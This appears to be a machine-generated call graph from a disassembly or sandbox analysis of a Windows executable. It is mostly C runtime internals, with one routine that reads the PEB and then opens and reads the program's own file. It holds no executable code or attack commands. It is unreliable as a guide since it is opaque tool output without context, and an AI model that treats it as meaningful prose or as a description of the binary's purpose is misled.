21583 a1ec2 std::ios_base::_Ios_base_dtor 21581->21583 21582->21583 21584 b7ddf std::_Throw_Cpp_error 29 API calls 21582->21584 21585 a1eec 21584->21585 21587 b356c _Fputc 21586->21587 21588 b358e 21587->21588 21590 b35b5 21587->21590 21589 b7f78 __strnicoll 29 API calls 21588->21589 21591 b35a9 _Fputc 21589->21591 21593 b4d0d 21590->21593 21591->21543 21594 b4d19 ___scrt_is_nonwritable_in_current_image 21593->21594 21601 b3315 EnterCriticalSection 21594->21601 21596 b4d27 21602 b46e2 21596->21602 21601->21596 21616 be68b 21602->21616 21604 b4709 21623 b3b31 21604->21623 21611 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21612 b477c 21611->21612 21613 b4d5c 21612->21613 22052 b3329 LeaveCriticalSection 21613->22052 21615 b4d45 21615->21591 21646 be736 21616->21646 21618 be69c _Fputc 21619 be6fe 21618->21619 21620 bbf11 __fread_nolock 15 API calls 21618->21620 21619->21604 21621 be6f5 21620->21621 21622 bbed7 ___free_lconv_mon 14 API calls 21621->21622 21622->21619 21662 b3a93 21623->21662 21626 b3b57 21627 b7f78 __strnicoll 29 API calls 21626->21627 21628 b3b74 21627->21628 21639 b3861 21628->21639 21633 b39f2 66 API calls 21634 b3b7f std::_Locinfo::_Locinfo_dtor 21633->21634 21634->21628 21634->21633 21635 b3d73 21634->21635 21668 b3790 21634->21668 21674 b3de1 21634->21674 21677 b3e59 21634->21677 21717 b3fb2 21634->21717 21636 b7f78 __strnicoll 29 API calls 21635->21636 21637 b3d8d 21636->21637 21638 b7f78 __strnicoll 29 API calls 21637->21638 21638->21628 21640 bbed7 ___free_lconv_mon 14 API calls 21639->21640 21641 b3871 21640->21641 21642 be774 21641->21642 21643 be77f 21642->21643 21644 b476a 21642->21644 21643->21644 21645 b85b8 ___scrt_uninitialize_crt 64 API calls 21643->21645 21644->21611 21645->21644 21647 be742 _Fputc 21646->21647 21648 be76c 21647->21648 21649 bf704 _Ungetc 29 API calls 21647->21649 21648->21618 21650 be75d 21649->21650 21653 c744f 21650->21653 21652 be763 21652->21618 21654 c745c 21653->21654 21656 c7469 21653->21656 21655 b76e4 __dosmaperr 14 API calls 21654->21655 21657 c7461 21655->21657 21658 c7475 21656->21658 21659 b76e4 __dosmaperr 14 API calls 21656->21659 21657->21652 21658->21652 21660 c7496 21659->21660 21661 b7dcf __strnicoll 29 API calls 21660->21661 21661->21657 21663 b3a9e 21662->21663 21664 b3ac0 21662->21664 21665 b7f78 __strnicoll 29 API calls 21663->21665 21752 b35fc 21664->21752 21667 b3ab9 21665->21667 21667->21626 21667->21628 21667->21634 21669 b37a0 21668->21669 21760 bc7a8 21669->21760 21768 b4dda 21674->21768 21676 b3e1c 21676->21634 21678 b3e60 21677->21678 21679 b3e77 21677->21679 21680 b4042 21678->21680 21681 b3fd6 21678->21681 21692 b3eb6 21678->21692 21682 b7f78 __strnicoll 29 API calls 21679->21682 21679->21692 21685 b4081 21680->21685 21686 b4047 21680->21686 21683 b406a 21681->21683 21684 b3fdc 21681->21684 21687 b3eab 21682->21687 21816 b4b80 21683->21816 21699 b3fe1 21684->21699 21700 b4037 21684->21700 21688 b40a0 21685->21688 21689 b4086 21685->21689 21690 b4049 21686->21690 21691 b4078 21686->21691 21687->21634 21827 b460c 21688->21827 21689->21683 21695 b4009 21689->21695 21689->21700 21694 b3ff0 21690->21694 21703 b4058 21690->21703 21823 b45ef 21691->21823 21692->21634 21701 b40ab 21694->21701 21791 b445e 21694->21791 21695->21701 21713 b41ac 21695->21713 21830 b3acb 21695->21830 21699->21694 21699->21695 21704 b401c 21699->21704 21700->21701 21805 b4866 21700->21805 21707 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21701->21707 21703->21683 21706 b405c 21703->21706 21704->21701 21801 b42f4 21704->21801 21706->21701 21812 b4622 21706->21812 21708 b42f2 21707->21708 21708->21634 21711 b3acb 66 API calls 21711->21713 21712 b4284 21712->21701 21716 b3acb 66 API calls 21712->21716 21713->21711 21715 b421f 21713->21715 21715->21712 21834 bf430 21715->21834 21716->21712 21718 b4042 21717->21718 21719 b3fd6 21717->21719 21722 b4081 21718->21722 21723 b4047 21718->21723 21720 b406a 21719->21720 21721 b3fdc 21719->21721 21729 b4b80 30 API calls 21720->21729 21733 b3fe1 21721->21733 21734 b4037 21721->21734 21724 b40a0 21722->21724 21725 b4086 21722->21725 21726 b4049 21723->21726 21727 b4078 21723->21727 21728 b460c 30 API calls 21724->21728 21725->21720 21725->21734 21743 b4009 21725->21743 21731 b3ff0 21726->21731 21737 b4058 21726->21737 21730 b45ef 30 API calls 21727->21730 21728->21743 21729->21743 21730->21743 21732 b445e 42 API calls 21731->21732 21746 b40ab 21731->21746 21732->21743 21733->21731 21735 b401c 21733->21735 21733->21743 21736 b4866 30 API calls 21734->21736 21734->21746 21739 b42f4 41 API calls 21735->21739 21735->21746 21736->21743 21737->21720 21738 b405c 21737->21738 21742 b4622 29 API calls 21738->21742 21738->21746 21739->21743 21740 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21741 b42f2 21740->21741 21741->21634 21742->21743 21744 b3acb 66 API calls 21743->21744 21743->21746 21749 b41ac 21743->21749 21744->21743 21745 b3acb 66 API calls 21745->21749 21746->21740 21747 b4284 21747->21746 21751 b3acb 66 API calls 21747->21751 21748 bf430 _Fputc 41 API calls 21750 b421f 21748->21750 21749->21745 21749->21750 21750->21747 21750->21748 21751->21747 21753 b3610 21752->21753 21759 b367a 21752->21759 21754 bf704 _Ungetc 29 API calls 21753->21754 21755 b3617 21754->21755 21756 b76e4 __dosmaperr 14 API calls 21755->21756 21755->21759 21757 b366f 21756->21757 21758 b7dcf __strnicoll 29 API calls 21757->21758 21758->21759 21759->21667 21761 bc7bf 21760->21761 21762 b37bd 21760->21762 21761->21762 21763 c08a5 __Getctype 39 API calls 21761->21763 21764 bc7d9 21762->21764 21763->21762 21765 bc7f0 21764->21765 21766 b37ca 21764->21766 21765->21766 21767 bdb02 __strnicoll 39 API calls 21765->21767 21766->21634 21767->21766 21778 b4d68 21768->21778 21770 b4dec 21771 b4e01 21770->21771 21774 b4e34 21770->21774 21777 b4e1c std::_Locinfo::_Locinfo_dtor 21770->21777 21772 b7f78 __strnicoll 29 API calls 21771->21772 21772->21777 21773 b4ecb 21775 b4db1 29 API calls 21773->21775 21774->21773 21785 b4db1 21774->21785 21775->21777 21777->21676 21779 b4d6d 21778->21779 21780 b4d80 21778->21780 21781 b76e4 __dosmaperr 14 API calls 21779->21781 21780->21770 21782 b4d72 21781->21782 21783 b7dcf __strnicoll 29 API calls 21782->21783 21784 b4d7d 21783->21784 21784->21770 21786 b4dc2 21785->21786 21787 b4dd6 21785->21787 21786->21787 21788 b76e4 __dosmaperr 14 API calls 21786->21788 21787->21773 21789 b4dcb 21788->21789 21790 b7dcf __strnicoll 29 API calls 21789->21790 21790->21787 21792 b4478 21791->21792 21844 b477e 21792->21844 21794 b44b7 21855 be8ff 21794->21855 21797 b456e 21799 b3790 _Fputc 39 API calls 21797->21799 21800 b45a1 21797->21800 21798 b3790 _Fputc 39 API calls 21798->21797 21799->21800 21800->21695 21802 b430f 21801->21802 21803 b4345 21802->21803 21804 bf430 _Fputc 41 API calls 21802->21804 21803->21695 21804->21803 21806 b487b 21805->21806 21807 b489d 21806->21807 21809 b48c4 21806->21809 21808 b7f78 __strnicoll 29 API calls 21807->21808 21811 b48ba 21808->21811 21810 b477e 15 API calls 21809->21810 21809->21811 21810->21811 21811->21695 21815 b4638 21812->21815 21813 b7f78 __strnicoll 29 API calls 21814 b4659 21813->21814 21814->21695 21815->21813 21815->21814 21817 b4b95 21816->21817 21818 b4bb7 21817->21818 21820 b4bde 21817->21820 21819 b7f78 __strnicoll 29 API calls 21818->21819 21822 b4bd4 21819->21822 21821 b477e 15 API calls 21820->21821 21820->21822 21821->21822 21822->21695 21824 b45fb 21823->21824 22003 b49f3 21824->22003 21826 b460b 21826->21695 21828 b4866 30 API calls 21827->21828 21829 b4621 21828->21829 21829->21695 21831 b3add 21830->21831 21832 b3ae5 21831->21832 22010 b8c30 21831->22010 21832->21695 21835 bf445 21834->21835 21836 bf486 21835->21836 21837 b3790 _Fputc 39 API calls 21835->21837 21842 bf449 __fread_nolock _Fputc 21835->21842 21843 bf472 __fread_nolock 21835->21843 21839 bc021 _Fputc WideCharToMultiByte 21836->21839 21836->21842 21836->21843 21837->21836 21838 b7f78 __strnicoll 29 API calls 21838->21842 21840 bf541 21839->21840 21841 bf557 GetLastError 21840->21841 21840->21842 21841->21842 21841->21843 21842->21715 21843->21838 21843->21842 21845 b47a5 21844->21845 21847 b4793 21844->21847 21846 bbf11 __fread_nolock 15 API calls 21845->21846 21845->21847 21848 b47c9 21846->21848 21847->21794 21849 b47dc 21848->21849 21850 b47d1 21848->21850 21874 b383d 21849->21874 21851 bbed7 ___free_lconv_mon 14 API calls 21850->21851 21851->21847 21854 bbed7 ___free_lconv_mon 14 API calls 21854->21847 21856 be934 21855->21856 21858 be910 21855->21858 21856->21858 21859 be967 21856->21859 21857 b7f78 __strnicoll 29 API calls 21869 b454a 21857->21869 21858->21857 21860 be9a0 21859->21860 21863 be9cf 21859->21863 21877 beab4 21860->21877 21861 be9f8 21866 bea5f 21861->21866 21867 bea25 21861->21867 21862 be9fd 21885 bee76 21862->21885 21863->21861 21863->21862 21912 bec9c 21866->21912 21870 bea2a 21867->21870 21871 bea45 21867->21871 21869->21797 21869->21798 21895 bf327 21870->21895 21905 bf291 21871->21905 21875 bbed7 ___free_lconv_mon 14 API calls 21874->21875 21876 b384c 21875->21876 21876->21854 21878 beaca 21877->21878 21879 bead5 21877->21879 21878->21869 21880 bbb4c ___std_exception_copy 29 API calls 21879->21880 21881 beb30 21880->21881 21882 beb3a 21881->21882 21883 b7dfc __Getctype 11 API calls 21881->21883 21882->21869 21884 beb48 21883->21884 21886 bee89 21885->21886 21887 beeba 21886->21887 21888 bee98 21886->21888 21890 beecf 21887->21890 21892 bef22 21887->21892 21889 b7f78 __strnicoll 29 API calls 21888->21889 21894 beeb0 __fread_nolock __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z _strrchr __allrem 21889->21894 21891 bec9c 41 API calls 21890->21891 21891->21894 21893 b3790 _Fputc 39 API calls 21892->21893 21892->21894 21893->21894 21894->21869 21919 c7792 21895->21919 21906 c7792 31 API calls 21905->21906 21907 bf2c0 21906->21907 21908 c75e7 29 API calls 21907->21908 21909 bf301 21908->21909 21910 bf308 21909->21910 21911 bf1a3 39 API calls 21909->21911 21910->21869 21911->21910 21913 c7792 31 API calls 21912->21913 21914 becc6 21913->21914 21915 c75e7 29 API calls 21914->21915 21916 bed14 21915->21916 21917 bed1b 21916->21917 21918 beb49 41 API calls 21916->21918 21917->21869 21918->21917 21920 c77c6 21919->21920 21921 b7343 29 API calls 21920->21921 21923 c782f 21921->21923 21922 c785b 21924 bbb4c ___std_exception_copy 29 API calls 21922->21924 21923->21922 21925 c78ed 21923->21925 21928 c78c8 21923->21928 21929 c7888 21923->21929 21926 c78b8 21924->21926 21927 b7343 29 API calls 21925->21927 21930 c8d6d 21926->21930 21938 c78c3 21926->21938 21932 c7917 21927->21932 21931 bbb4c ___std_exception_copy 29 API calls 21928->21931 21929->21922 21929->21925 21933 b7dfc __Getctype 11 API calls 21930->21933 21931->21926 21934 b7343 29 API calls 21932->21934 21935 c8d79 21933->21935 21936 c792a 21934->21936 21940 ca4c0 21 API calls 21936->21940 21937 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21939 bf357 21937->21939 21938->21937 21975 c75e7 21939->21975 21941 c79a4 21940->21941 21942 ca660 __floor_pentium4 21 API calls 21941->21942 21943 c79ae 21942->21943 21976 c75f8 21975->21976 21978 c761a 21975->21978 21977 b7f78 __strnicoll 29 API calls 21976->21977 21980 c7610 codecvt 21977->21980 21979 b7f78 __strnicoll 29 API calls 21978->21979 21978->21980 21979->21980 22004 b4a08 22003->22004 22005 b4a2a 22004->22005 22008 b4a51 22004->22008 22006 b7f78 __strnicoll 29 API calls 22005->22006 22007 b4a47 22006->22007 22007->21826 22008->22007 22009 b477e 15 API calls 22008->22009 22009->22007 22011 b8c4f 22010->22011 22012 b8c3e 22010->22012 22011->21832 22015 c4a37 22012->22015 22014 b8c4a 22014->21832 22016 c4ad2 22015->22016 22017 bf704 _Ungetc 29 API calls 22016->22017 22019 c4adf 22017->22019 22018 c4aeb 22018->22014 22019->22018 22020 c4b37 22019->22020 22039 c4a4d 22019->22039 22020->22018 22022 be736 _Fputc 29 API calls 22020->22022 22027 c4b99 22020->22027 22024 c4b8c 22022->22024 22024->22027 22047 c669f 22024->22047 22028 c4cc2 22027->22028 22029 bf704 _Ungetc 29 API calls 22028->22029 22030 c4cd1 22029->22030 22031 c4ce4 22030->22031 22032 c4d77 22030->22032 22033 c4d01 22031->22033 22037 c4d28 22031->22037 22034 c3e10 _Fputc 64 API calls 22032->22034 22035 c3e10 _Fputc 64 API calls 22033->22035 22036 c4baa 22034->22036 22035->22036 22036->22014 22037->22036 22038 c2922 _Fputc 33 API calls 22037->22038 22038->22036 22040 c4a67 22039->22040 22041 c4a63 22039->22041 22042 c4ab6 22040->22042 22043 c361f _Fputc 29 API calls 22040->22043 22041->22020 22042->22020 22044 c4a88 22043->22044 22044->22042 22045 c4a90 SetFilePointerEx 22044->22045 22045->22042 22046 c4aa7 GetFileSizeEx 22045->22046 22046->22042 22048 bd2b4 __Getctype 14 API calls 22047->22048 22049 c66bc 22048->22049 22050 bbed7 ___free_lconv_mon 14 API calls 22049->22050 22051 c66c6 22050->22051 22051->22027 22052->21615 22122 aa9f4 22053->22122 22056 aa9f4 std::_Lockit::_Lockit 7 API calls 22057 a44b7 22056->22057 22128 aaa25 22057->22128 22058 a44d8 22069 a4556 22058->22069 22135 a45f0 22058->22135 22059 aaa25 std::_Lockit::~_Lockit 2 API calls 22062 a4585 22059->22062 22062->21571 22064 a4598 22152 a3e50 22064->22152 22065 a4543 22147 aab43 22065->22147 22069->22059 22071 adf1e 22070->22071 22078 adf17 22070->22078 22074 adf69 22071->22074 22076 adfd0 22071->22076 22071->22078 22072 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22073 ae01c 22072->22073 22073->21571 22074->22078 22462 adada 22074->22462 22076->22078 22465 b932d 22076->22465 22078->22072 22080 a2d5a 22079->22080 22081 a2c90 22079->22081 22080->21563 22082 a2cb3 22081->22082 22083 a2c50 39 API calls 22081->22083 22087 a2cd7 22081->22087 22082->22080 22084 a38e0 39 API calls 22082->22084 22083->22087 22084->22080 22085 a2f00 std::ios_base::_Init 38 API calls 22085->22087 22086 a32c0 std::ios_base::_Init 30 API calls 22086->22087 22087->22082 22087->22085 22087->22086 22088 b060c Concurrency::cancel_current_task RaiseException 22087->22088 22088->22087 22090 a3919 22089->22090 22096 a3962 22089->22096 22091 a2f00 std::ios_base::_Init 38 API calls 22090->22091 22090->22096 22092 a3998 22091->22092 22093 a32c0 std::ios_base::_Init 30 API calls 22092->22093 22094 a39aa 22093->22094 22095 b060c Concurrency::cancel_current_task RaiseException 22094->22095 22095->22096 22096->21564 22098 a2f28 22097->22098 22099 a2f34 22097->22099 22098->21570 22589 aa6ef AcquireSRWLockExclusive 22099->22589 22101 a2f40 22101->22098 22594 aa7a4 22101->22594 22106 a3307 _strlen 22105->22106 22107 a33ff 22106->22107 22108 a3312 22106->22108 22109 a2600 std::_Throw_Cpp_error 30 API calls 22107->22109 22110 a331c codecvt 22108->22110 22111 a3369 22108->22111 22112 a3352 22108->22112 22113 a33ad 22109->22113 22119 a3430 std::_Throw_Cpp_error 30 API calls 22110->22119 22115 aa663 codecvt 3 API calls 22111->22115 22114 aa663 codecvt 3 API calls 22112->22114 22116 b7ddf std::_Throw_Cpp_error 29 API calls 22113->22116 22121 a33d3 std::ios_base::_Ios_base_dtor 22113->22121 22114->22110 22115->22110 22117 a3409 22116->22117 22118 a1460 std::_Throw_Cpp_error 29 API calls 22117->22118 22120 a341f 22118->22120 22119->22113 22120->21570 22121->21570 22123 aaa03 22122->22123 22126 aaa0a 22122->22126 22155 b810f 22123->22155 22125 a449a 22125->22056 22125->22058 22126->22125 22160 afac8 EnterCriticalSection 22126->22160 22129 aaa2f 22128->22129 22130 b811d 22128->22130 22131 aaa42 22129->22131 22209 afad6 LeaveCriticalSection 22129->22209 22210 b80f8 LeaveCriticalSection 22130->22210 22131->22058 22134 b8124 22134->22058 22136 a4628 22135->22136 22137 a453b 22135->22137 22136->22137 22138 aa663 codecvt 3 API calls 22136->22138 22137->22064 22137->22065 22139 a463b 22138->22139 22211 a3e90 22139->22211 22148 aab4e ___std_exception_copy 22147->22148 22149 aab55 22148->22149 22458 ab4b2 22148->22458 22149->22069 22153 b060c Concurrency::cancel_current_task RaiseException 22152->22153 22154 a3e82 22153->22154 22161 bced4 22155->22161 22160->22125 22162 bd05b std::_Lockit::_Lockit 5 API calls 22161->22162 22163 bced9 22162->22163 22182 bd075 22163->22182 22181 bcf06 22181->22181 22183 bcfd6 __Getctype 5 API calls 22182->22183 22184 bcede 22183->22184 22185 bd08f 22184->22185 22186 bcfd6 __Getctype 5 API calls 22185->22186 22187 bcee3 22186->22187 22188 bd0a9 22187->22188 22189 bcfd6 __Getctype 5 API calls 22188->22189 22190 bcee8 22189->22190 22191 bd0c3 22190->22191 22192 bcfd6 __Getctype 5 API calls 22191->22192 22193 bceed 22192->22193 22194 bd0dd 22193->22194 22195 bcfd6 __Getctype 5 API calls 22194->22195 22196 bcef2 22195->22196 22197 bd0f7 22196->22197 22198 bcfd6 __Getctype 5 API calls 22197->22198 22199 bcef7 22198->22199 22200 bd111 22199->22200 22201 bcfd6 __Getctype 5 API calls 22200->22201 22202 bcefc 22201->22202 22203 bd12b 22202->22203 22204 bcfd6 __Getctype 5 API calls 22203->22204 22205 bcf01 22204->22205 22206 bd145 22205->22206 22207 bcfd6 __Getctype 5 API calls 22206->22207 22208 bd15b 22207->22208 22208->22181 22209->22131 22210->22134 22212 aa9f4 std::_Lockit::_Lockit 7 API calls 22211->22212 22213 a3ecb 22212->22213 22214 a3f18 22213->22214 22215 a3f3f 22213->22215 22273 aabc5 22214->22273 22282 ab4ef 22215->22282 22287 b974f 22273->22287 22277 aabea 22278 aabf9 22277->22278 22280 b974f std::_Locinfo::_Locinfo_dtor 64 API calls 22277->22280 22280->22278 22283 a7900 codecvt 29 API calls 22282->22283 22284 ab500 22283->22284 22285 b060c Concurrency::cancel_current_task RaiseException 22284->22285 22286 ab50e 22285->22286 22288 bced4 std::_Lockit::_Lockit 5 API calls 22287->22288 22289 b975c 22288->22289 22296 b9981 22289->22296 22292 aac2b 22293 aac39 22292->22293 22294 aac45 ___std_exception_copy codecvt 22292->22294 22293->22294 22295 b92d7 ___std_exception_copy 14 API calls 22293->22295 22294->22277 22295->22294 22297 b998d ___scrt_is_nonwritable_in_current_image 22296->22297 22304 b80e1 EnterCriticalSection 22297->22304 22299 b999b 22305 b9822 22299->22305 22301 b99a8 22333 b99d0 22301->22333 22304->22299 22336 b9787 22305->22336 22307 b983d 22308 bc16a __Getctype 39 API calls 22307->22308 22332 b9888 22307->22332 22309 b984a 22308->22309 22383 ba8d1 22309->22383 22332->22301 22417 b80f8 LeaveCriticalSection 22333->22417 22335 aabd2 22335->22292 22337 b9793 22336->22337 22338 b97a1 22336->22338 22388 b59d6 22337->22388 22403 c6309 22338->22403 22341 b979d 22341->22307 22342 b97b8 22343 b9817 22342->22343 22344 bd2b4 __Getctype 14 API calls 22342->22344 22345 b7dfc __Getctype 11 API calls 22343->22345 22346 b97d3 22344->22346 22347 b9821 22345->22347 22348 b97fb 22346->22348 22349 c6309 std::_Locinfo::_Locinfo_dtor 41 API calls 22346->22349 22352 b9787 std::_Locinfo::_Locinfo_dtor 64 API calls 22347->22352 22350 bbed7 ___free_lconv_mon 14 API calls 22348->22350 22353 b97ea 22349->22353 22351 b9810 22350->22351 22351->22307 22354 b983d 22352->22354 22355 b97fd 22353->22355 22356 b97f1 22353->22356 22358 bc16a __Getctype 39 API calls 22354->22358 22379 b9888 22354->22379 22357 b59d6 std::_Locinfo::_Locinfo_dtor 60 API calls 22355->22357 22356->22343 22356->22348 22357->22348 22359 b984a 22358->22359 22360 ba8d1 std::_Locinfo::_Locinfo_dtor 41 API calls 22359->22360 22361 b986f 22360->22361 22362 b9876 22361->22362 22363 bbf11 __fread_nolock 15 API calls 22361->22363 22365 b7dfc __Getctype 11 API calls 22362->22365 22362->22379 22364 b989b 22363->22364 22366 ba8d1 std::_Locinfo::_Locinfo_dtor 41 API calls 22364->22366 22364->22379 22370 b9980 ___scrt_is_nonwritable_in_current_image 22365->22370 22379->22307 22384 ba8e5 _Fputc 22383->22384 22408 babb6 22384->22408 22389 b59ec 22388->22389 22390 b5a00 22388->22390 22391 b76e4 __dosmaperr 14 API calls 22389->22391 22392 bc16a __Getctype 39 API calls 22390->22392 22393 b59f1 22391->22393 22394 b5a05 22392->22394 22395 b7dcf __strnicoll 29 API calls 22393->22395 22396 bced4 std::_Lockit::_Lockit 5 API calls 22394->22396 22397 b59fc 22395->22397 22398 b5a0d 22396->22398 22397->22341 22399 c08a5 __Getctype 39 API calls 22398->22399 22400 b5a12 22399->22400 22401 b6ff3 std::_Locinfo::_Locinfo_dtor 60 API calls 22400->22401 22402 b5a54 22401->22402 22402->22341 22404 c631c _Fputc 22403->22404 22405 c650d std::_Locinfo::_Locinfo_dtor 41 API calls 22404->22405 22406 c6334 _Fputc 22405->22406 22406->22342 22409 babcd 22408->22409 22410 babf7 22409->22410 22414 babd1 22409->22414 22411 b7f78 __strnicoll 29 API calls 22410->22411 22412 bac0f 22411->22412 22413 babef 22413->22412 22416 b7f78 __strnicoll 29 API calls 22413->22416 22414->22413 22415 ba90f std::_Locinfo::_Locinfo_dtor 41 API calls 22414->22415 22415->22413 22416->22412 22417->22335 22459 ab4c0 Concurrency::cancel_current_task 22458->22459 22460 b060c Concurrency::cancel_current_task RaiseException 22459->22460 22461 ab4ce 22460->22461 22469 b8d91 22462->22469 22464 adae8 22464->22078 22466 b9340 _Fputc 22465->22466 22551 b950e 22466->22551 22468 b9355 _Fputc 22468->22078 22470 b8da4 _Fputc 22469->22470 22473 b8f33 22470->22473 22472 b8db3 _Fputc 22472->22464 22474 b8f3f ___scrt_is_nonwritable_in_current_image 22473->22474 22475 b8f6b 22474->22475 22476 b8f46 22474->22476 22484 b3315 EnterCriticalSection 22475->22484 22477 b7f78 __strnicoll 29 API calls 22476->22477 22483 b8f61 22477->22483 22479 b8f7a 22485 b8dc7 22479->22485 22483->22472 22484->22479 22486 b8dfe 22485->22486 22487 b8dec 22485->22487 22489 bf704 _Ungetc 29 API calls 22486->22489 22517 b8eff 22487->22517 22490 b8e05 22489->22490 22491 bf704 _Ungetc 29 API calls 22490->22491 22496 b8e2d 22490->22496 22493 b8e16 22491->22493 22492 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22494 b8efd 22492->22494 22493->22496 22498 bf704 _Ungetc 29 API calls 22493->22498 22514 b8fbb 22494->22514 22495 b8ee3 22497 b8eff _Fputc 66 API calls 22495->22497 22496->22495 22499 bf704 _Ungetc 29 API calls 22496->22499 22500 b8df6 22497->22500 22501 b8e22 22498->22501 22502 b8e60 22499->22502 22500->22492 22503 bf704 _Ungetc 29 API calls 22501->22503 22504 b8e83 22502->22504 22506 bf704 _Ungetc 29 API calls 22502->22506 22503->22496 22504->22495 22505 b8e9b 22504->22505 22508 bf430 _Fputc 41 API calls 22505->22508 22507 b8e6c 22506->22507 22507->22504 22510 bf704 _Ungetc 29 API calls 22507->22510 22509 b8ead 22508->22509 22509->22500 22513 b8c30 _Fputc 66 API calls 22509->22513 22511 b8e78 22510->22511 22512 bf704 _Ungetc 29 API calls 22511->22512 22512->22504 22513->22509 22550 b3329 LeaveCriticalSection 22514->22550 22516 b8fc1 22516->22483 22518 b8f0d 22517->22518 22519 b8f22 22517->22519 22522 c4a42 22518->22522 22519->22500 22521 b8f1d 22521->22500 22523 c4bc8 22522->22523 22524 bf704 _Ungetc 29 API calls 22523->22524 22527 c4bd5 22524->22527 22525 c4be1 22525->22521 22526 c4c2f 22526->22525 22529 c4c91 22526->22529 22531 be736 _Fputc 29 API calls 22526->22531 22527->22525 22527->22526 22528 c4a4d _Fputc 31 API calls 22527->22528 22528->22526 22535 c4d94 22529->22535 22532 c4c84 22531->22532 22532->22529 22534 c669f _Ungetc 14 API calls 22532->22534 22534->22529 22536 bf704 _Ungetc 29 API calls 22535->22536 22537 c4da3 22536->22537 22538 c4e4c 22537->22538 22539 c4db6 22537->22539 22540 c3e10 _Fputc 64 API calls 22538->22540 22541 c4dd7 22539->22541 22544 c4dfd 22539->22544 22543 c4ca2 22540->22543 22542 c3e10 _Fputc 64 API calls 22541->22542 22542->22543 22543->22521 22544->22543 22546 c2922 22544->22546 22547 c2936 _Fputc 22546->22547 22548 c29de _Fputc 33 API calls 22547->22548 22549 c294b _Fputc 22548->22549 22549->22543 22550->22516 22552 b951c 22551->22552 22553 b9544 22551->22553 22552->22553 22554 b954b 22552->22554 22555 b9529 22552->22555 22553->22468 22559 b95d1 22554->22559 22556 b7f78 __strnicoll 29 API calls 22555->22556 22556->22553 22560 b95dd ___scrt_is_nonwritable_in_current_image 22559->22560 22567 b3315 EnterCriticalSection 22560->22567 22562 b95eb 22568 b9585 22562->22568 22567->22562 22569 be68b 30 API calls 22568->22569 22570 b959d 22569->22570 22578 b9367 22570->22578 22573 be774 64 API calls 22574 b95c7 22573->22574 22575 b9620 22574->22575 22588 b3329 LeaveCriticalSection 22575->22588 22577 b9583 22577->22468 22580 b9379 22578->22580 22583 b93a2 22578->22583 22579 b9387 22581 b7f78 __strnicoll 29 API calls 22579->22581 22580->22579 22580->22583 22586 b93bd codecvt 22580->22586 22581->22583 22582 c4a37 _Fputc 66 API calls 22582->22586 22583->22573 22584 b85b8 ___scrt_uninitialize_crt 64 API calls 22584->22586 22585 bf704 _Ungetc 29 API calls 22585->22586 22586->22582 22586->22583 22586->22584 22586->22585 22587 c3e10 _Fputc 64 API calls 22586->22587 22587->22586 22588->22577 22590 aa703 22589->22590 22591 aa708 ReleaseSRWLockExclusive 22590->22591 22598 aa78f SleepConditionVariableSRW 22590->22598 22591->22101 22599 aa7b9 22594->22599 22597 aa73e AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 22597->22098 22598->22590 22600 aa7c8 22599->22600 22601 aa7cf 22599->22601 22605 b743c 22600->22605 22608 b73cb 22601->22608 22604 a2f58 22604->22597 22606 b73cb std::ios_base::_Init 32 API calls 22605->22606 22607 b744e 22606->22607 22607->22604 22611 b762e 22608->22611 22612 b763a ___scrt_is_nonwritable_in_current_image 22611->22612 22619 b80e1 EnterCriticalSection 22612->22619 22614 b7648 22620 b7452 22614->22620 22616 b7655 22630 b767d 22616->22630 22619->22614 22621 b746d 22620->22621 22629 b74e0 __Getctype 22620->22629 22622 b74c0 22621->22622 22624 c28b5 std::ios_base::_Init 32 API calls 22621->22624 22621->22629 22623 c28b5 std::ios_base::_Init 32 API calls 22622->22623 22622->22629 22625 b74d6 22623->22625 22626 b74b6 22624->22626 22627 bbed7 ___free_lconv_mon 14 API calls 22625->22627 22628 bbed7 ___free_lconv_mon 14 API calls 22626->22628 22627->22629 22628->22622 22629->22616 22633 b80f8 LeaveCriticalSection 22630->22633 22632 b73fc 22632->22604 22633->22632 22635 a4b4f 22634->22635 22637 a2c50 39 API calls 22635->22637 22638 a4b6f 22635->22638 22636 a2f00 std::ios_base::_Init 38 API calls 22636->22638 22637->22638 22638->22636 22639 a32c0 std::ios_base::_Init 30 API calls 22638->22639 22640 a4c3e 22638->22640 22643 b060c Concurrency::cancel_current_task RaiseException 22638->22643 22639->22638 22641 a1de4 22640->22641 22642 a38e0 39 API calls 22640->22642 22641->21579 22642->22641 22643->22638 22644 a98f0 22645 a98f9 22644->22645 22646 a990f 22644->22646 22651 a2270 GetModuleHandleA GetModuleFileNameW 22645->22651 22647 ab57d Concurrency::cancel_current_task RaiseException 22646->22647 22648 a9914 22647->22648 22658 ba89a 22651->22658 22653 a22b0 22662 a1fb0 GetPEB 22653->22662 22655 a22b9 22656 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22655->22656 22657 a22ca 22656->22657 22659 ba8ad _Fputc 22658->22659 22685 ba90f 22659->22685 22661 ba8bf _Fputc 22661->22653 22713 a1240 22662->22713 22664 a2009 CreateFileA 22666 a2041 GetFileSize 22664->22666 22674 a2225 22664->22674 22667 a21fc CloseHandle 22666->22667 22668 a2055 22666->22668 22667->22674 22669 a205d ReadFile 22668->22669 22670 a2079 CloseHandle 22669->22670 22671 a21f3 22669->22671 22672 a2205 22670->22672 22684 a2090 std::ios_base::_Ios_base_dtor codecvt _strlen 22670->22684 22671->22667 22725 a1ef0 22672->22725 22674->22655 22675 a223b 22676 a2600 std::_Throw_Cpp_error 30 API calls 22675->22676 22677 a2247 22676->22677 22678 b7ddf std::_Throw_Cpp_error 29 API calls 22677->22678 22680 a224c 22678->22680 22679 aa663 RaiseException EnterCriticalSection LeaveCriticalSection codecvt 22679->22684 22681 a1460 std::_Throw_Cpp_error 29 API calls 22680->22681 22683 a225f 22681->22683 22683->22655 22684->22672 22684->22675 22684->22677 22684->22679 22738 a1000 22684->22738 22686 ba93f 22685->22686 22687 ba94e 22686->22687 22688 ba96c 22686->22688 22699 ba943 22686->22699 22689 b7f78 __strnicoll 29 API calls 